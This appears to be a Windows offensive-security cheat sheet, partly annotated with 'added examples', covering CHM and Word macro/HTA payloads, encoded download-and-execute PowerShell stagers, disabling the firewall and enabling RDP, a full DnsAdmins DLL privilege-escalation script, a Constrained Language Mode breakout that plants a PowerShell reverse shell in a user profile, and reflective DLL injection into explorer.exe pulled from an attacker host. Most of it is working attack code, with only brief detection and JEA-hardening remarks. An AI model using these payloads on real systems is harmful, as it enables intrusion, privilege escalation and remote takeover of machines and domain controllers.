Use a Windows VM, install the required tools from here, then get the script Out-CHM.ps1 (from the Nishang framework) and create your payload (the -Payload value is the command the compiled help file will run when opened; the -HHCPath is the HTML Help Workshop install directory):

Out-CHM -Payload C:\Windows\System32\spool\drivers\color\nc.exe -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

Juicy Potato

Metasploit (Details)

use windows/local/ms16_075_reflection_juicy
set SESSION <>
set CLSID <>

Common CLSIDs for the exploit are:

  • {e60687f7-01a1-40aa-86ac-db1cbf673334}

  • {752073A1-23F2-4396-85F0-8FDB879ED0ED}

  • {3c6859ce-230b-48a4-be6c-932c0c202048}

  • {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}

  • {8F5DF053-3013-4dd8-B5F4-88214E81C0CF}

  • More can be found here

Word Macro

Simple Word macro (create it via View > Macros; before handing the file over, run File -> Info -> Check for Issues -> Inspect Document to purge personal details from the document metadata), then save as .doc:

Sub DoStuff()
    ' WScript.Shell lets the macro launch an arbitrary command line
    Dim wsh As Object
    Set wsh = CreateObject("WScript.Shell")
    ' second argument 0 = hidden window, so no console flashes up
    wsh.Run "<powershell command here>", 0
    Set wsh = Nothing
End Sub

' AutoOpen fires when the document is opened (once macros are enabled);
' it must actually call the payload routine or nothing runs
Sub AutoOpen()
    DoStuff
End Sub

Alternatively, we can use an HTA (launched with mshta.exe); the VBScript must call wsh.Run with the command and then invoke the routine, otherwise the HTA just opens and does nothing:

<script language="VBScript">
  Sub DoStuff()
    Dim wsh
    Set wsh = CreateObject("WScript.Shell")
    ' 0 = hidden window
    wsh.Run "powershell -Sta -Nop -Window Hidden -EncodedCommand <blah>", 0
    Set wsh = Nothing
  End Sub
  DoStuff
</script>
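Both the macro and the HTA hand PowerShell a -EncodedCommand value. As an added example (not from the original notes), the PowerShell below builds that value correctly and decodes one back. PowerShell expects the base64 of the UTF-16LE bytes of the script, not UTF-8; a UTF-8 blob decodes to garbage and the command silently fails. The download URL inside $cmd is a placeholder.

```powershell
# Added example: produce the base64 for powershell -EncodedCommand.
# PowerShell decodes the argument as UTF-16LE ("Unicode" in .NET), so the
# bytes must come from [Text.Encoding]::Unicode, not UTF8.
function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Command)
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($Command)
    [Convert]::ToBase64String($bytes)
}

# Reverse direction: decode a -EncodedCommand argument seen in a macro,
# an HTA or a process-creation log line.
function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Encoded)
    [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Encoded))
}

# Hypothetical stager; replace the URL with your own
$cmd = 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.5/run.ps1")'
$enc = ConvertTo-EncodedCommand $cmd

# This is the line to drop into wsh.Run in the macro / the <blah> slot in the HTA
"powershell -Sta -Nop -Window Hidden -EncodedCommand $enc"

# Round-trip check: the decoded text must equal the original script
if ((ConvertFrom-EncodedCommand $enc) -ne $cmd) { throw 'encoding round-trip failed' }
```

The same decoder is what you use on the defensive side when a Sysmon or 4688 event shows a long -EncodedCommand blob.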


Building and Signing MSIs

Use WiX to generate MSI files from XML, or to manipulate existing MSI files. A complete example can be seen in the Ethereal writeup.

Windows Firewall

List rules

netsh advfirewall firewall show rule name=all

Enable RDP on Windows 7 via cmd (the value is fDenyTSConnections, so this allows Terminal Services connections and does not touch the firewall; 0 = allow, 1 = deny):

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Enable RDP on Windows 7 via PowerShell (the -Value must be given, otherwise the command errors out):

powershell.exe -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -Value 0"

Disable Firewall on any windows via cmd

netsh Advfirewall set allprofiles state off
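Added example (not part of the original notes): a PowerShell version of the RDP and firewall steps above that also opens the "Remote Desktop" firewall rule group, which the registry flip alone does not do, and reads the state back so you know the change took. Only standard Windows commands are used; run it elevated.

```powershell
# Added example: enable RDP, open its firewall rule group, and verify.
function Enable-Rdp {
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    # 0 = allow Terminal Services connections; 1 = deny (client default)
    Set-ItemProperty -Path $key -Name fDenyTSConnections -Value 0 -Type DWord

    # With the firewall on, the "Remote Desktop" rule group must be enabled
    # as well. Enable-NetFirewallRule needs Windows 8 / Server 2012 or
    # later; netsh works everywhere (incl. Windows 7), so fall back to it.
    # --% stops PowerShell from re-parsing the quoted group name.
    if (Get-Command Enable-NetFirewallRule -ErrorAction SilentlyContinue) {
        Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'
    } else {
        netsh --% advfirewall firewall set rule group="remote desktop" new enable=Yes
    }
}

function Get-RdpState {
    $key  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $deny = (Get-ItemProperty -Path $key -Name fDenyTSConnections).fDenyTSConnections
    # A listening 3389 is the ground truth: the registry can say "allowed"
    # while TermService is stopped.
    $listening = [bool](netstat -an | Select-String ':3389\s+.*LISTENING')
    [pscustomobject]@{
        RdpAllowed    = ($deny -eq 0)
        Listening3389 = $listening
        # profile state lines from netsh, e.g. "State  ON"
        FirewallState = (netsh advfirewall show allprofiles state | Select-String 'State') -join '; '
    }
}

Enable-Rdp
Get-RdpState
```

If you would rather not open the firewall at all, leave the rule group alone and tunnel 3389 over your existing session instead; the registry change is still required either way.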

Load DLL from System32

Windows 10


To run commands with runas, the user has to have logged in at least once.


Elevate Privileges by loading a custom DLL as DNSAdmin

# requires RSAT
dnscmd <dc> /config /serverlevelplugindll \\<ip>\<dll>

# requires RSAT
$dnssettings = Get-DnsServerSetting -ComputerName <dc> -Verbose
$dnssettings.ServerLevelPluginDll = "\\<ip>\<dll>"
Set-DnsServerSetting -InputObject $dnssettings -ComputerName <dc> -Verbose

Then restart the service:

sc.exe stop dns
sc.exe start dns
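Added example (not from the original notes): the DnsAdmins plugin-DLL procedure above as a checked, reversible PowerShell script. It assumes the ActiveDirectory and DnsServer RSAT modules are present; the DC name and share path are placeholders. Two caveats a practitioner needs: the DNS service runs as SYSTEM on the DC, so it fetches the UNC path with the DC's machine account and the share must be readable by it (e.g. Everyone / Domain Computers); and the DLL must export DnsPluginInitialize, DnsPluginCleanup and DnsPluginQuery, otherwise DNS.EXE fails to start and you have taken the domain's DNS down.

```powershell
# Added example: set, verify, trigger and clean up ServerLevelPluginDll.
$Dc  = 'dc01'                         # hypothetical DC hostname
$Dll = '\\10.10.14.5\share\dns.dll'   # hypothetical attacker share + DLL

function Test-DnsAdminsMembership {
    # Only DnsAdmins members (or principals with write access on the DNS
    # server object) can change this setting over the DNS RPC interface.
    $groups = Get-ADPrincipalGroupMembership -Identity $env:USERNAME |
              Select-Object -ExpandProperty Name
    'DnsAdmins' -in $groups
}

function Set-DnsPluginDll {
    param([string]$Server, [string]$Path)
    # -All is needed to get the advanced settings that include the plugin DLL
    $settings = Get-DnsServerSetting -ComputerName $Server -All
    $settings.ServerLevelPluginDll = $Path
    Set-DnsServerSetting -InputObject $settings -ComputerName $Server
    # Read back; DNS.EXE only loads the DLL on its next start
    (Get-DnsServerSetting -ComputerName $Server -All).ServerLevelPluginDll
}

function Restart-DnsOnDc {
    param([string]$Server)
    # Stopping/starting the service is a separate right that DnsAdmins does
    # not grant by default; on "Access is denied" you need another account
    # or must wait for a reboot.
    sc.exe \\$Server stop dns
    Start-Sleep -Seconds 3
    sc.exe \\$Server start dns
}

function Clear-DnsPluginDll {
    param([string]$Server)
    # Clean up afterwards: if the value stays set and the share disappears,
    # DNS will not start on the next restart. The setting is stored under
    # the DNS service parameters key.
    reg.exe delete "\\$Server\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters" /v ServerLevelPluginDll /f
}

if (-not (Test-DnsAdminsMembership)) { throw 'current user is not in DnsAdmins' }
Set-DnsPluginDll -Server $Dc -Path $Dll
Restart-DnsOnDc -Server $Dc
# ... collect the SYSTEM shell from the DLL, then:
# Clear-DnsPluginDll -Server $Dc; Restart-DnsOnDc -Server $Dc
```

Detection-wise the same procedure leaves a registry modification on the DC (ServerLevelPluginDll under the DNS Parameters key) followed by a DNS service restart and an outbound SMB connection from the DC to a non-DC host; that triple is worth an alert on its own.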

DNS Enumeration/Exploitation Tools

Bypass JEA

When stuck in Constrained Language Mode (or a comparably restricted language mode):

Read File (drive-qualified variable syntax reads the file without calling any cmdlet):

${C:\file.txt}

Write File:

${C:\file.txt} = 'content'

Break out by writing a PowerShell profile (executed whenever this user starts a new powershell.exe; this only helps if that new process is not itself forced into Constrained Language Mode by AppLocker/WDAC, because the reverse shell below needs unrestricted .NET access):

${C:\users\<user>\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1} = '$client = New-Object System.Net.Sockets.TCPClient("<ip>",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

Via Script Blocks:

& { ls }

Custom function:

function xct { ls }

These bypasses only exist in Constrained Language Mode; a JEA endpoint should use NoLanguage mode, which rejects script text altogether (no script blocks, no function definitions, no variable syntax), so that only the role's visible cmdlets can be called by name.
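Added example (not from the original notes): the weak JEA endpoint the bypasses above work against, beside the hardened one. Endpoint name, paths and the role group CONTOSO\DnsOperators are placeholders; the cmdlets are standard PowerShell 5+. Run elevated on the host that exposes the endpoint.

```powershell
# Added example: weak vs. hardened JEA session configuration.
$Weak = 'C:\JEA\Weak.pssc'       # hypothetical paths
$Hard = 'C:\JEA\Hardened.pssc'
New-Item -ItemType Directory -Path 'C:\JEA\Transcripts' -Force | Out-Null

$Roles = @{ 'CONTOSO\DnsOperators' = @{ VisibleCmdlets = 'Get-Service', 'Restart-Service' } }

# Weak: ConstrainedLanguage still parses script text, so ${C:\file.txt},
# & { ls } and "function x { ls }" all get through the language gate and
# run whatever the visible command set allows.
New-PSSessionConfigurationFile -Path $Weak `
    -SessionType RestrictedRemoteServer `
    -LanguageMode ConstrainedLanguage `
    -RoleDefinitions $Roles

# Hardened: NoLanguage refuses script text entirely; the caller can only
# invoke the role's visible cmdlets by name with parameters. A virtual
# account keeps the caller's credentials out of the session, and the
# transcript directory records every command for review.
New-PSSessionConfigurationFile -Path $Hard `
    -SessionType RestrictedRemoteServer `
    -LanguageMode NoLanguage `
    -RunAsVirtualAccount `
    -TranscriptDirectory 'C:\JEA\Transcripts' `
    -RoleDefinitions $Roles

# Validate both files before registering anything
foreach ($f in $Weak, $Hard) {
    if (-not (Test-PSSessionConfigurationFile -Path $f)) { throw "invalid config: $f" }
}

# Register only the hardened one
Register-PSSessionConfiguration -Name 'DnsOps' -Path $Hard -Force | Out-Null
```

From the attacker's side, the first thing to check after landing in a restricted shell is $ExecutionContext.SessionState.LanguageMode: if it prints ConstrainedLanguage the tricks above apply; in a NoLanguage session that expression itself is refused.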

RCE via Cab Files

Reflectively load a DLL into explorer.exe (via Invoke-ReflectivePEInjection.ps1 from PowerSploit; the original notes carried this as a single command string, e.g. for embedding in a loader):

$bytes = (New-Object System.Net.WebClient).DownloadData('http://<ip>/payload.dll')
(New-Object System.Net.WebClient).DownloadString('http://<ip>/Invoke-ReflectivePEInjection.ps1') | IEX
# more than one explorer.exe can exist (several logged-on users); take a single PID
$procid = (Get-Process -Name explorer | Select-Object -First 1).Id
Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid

Dump Sticky Note Contents

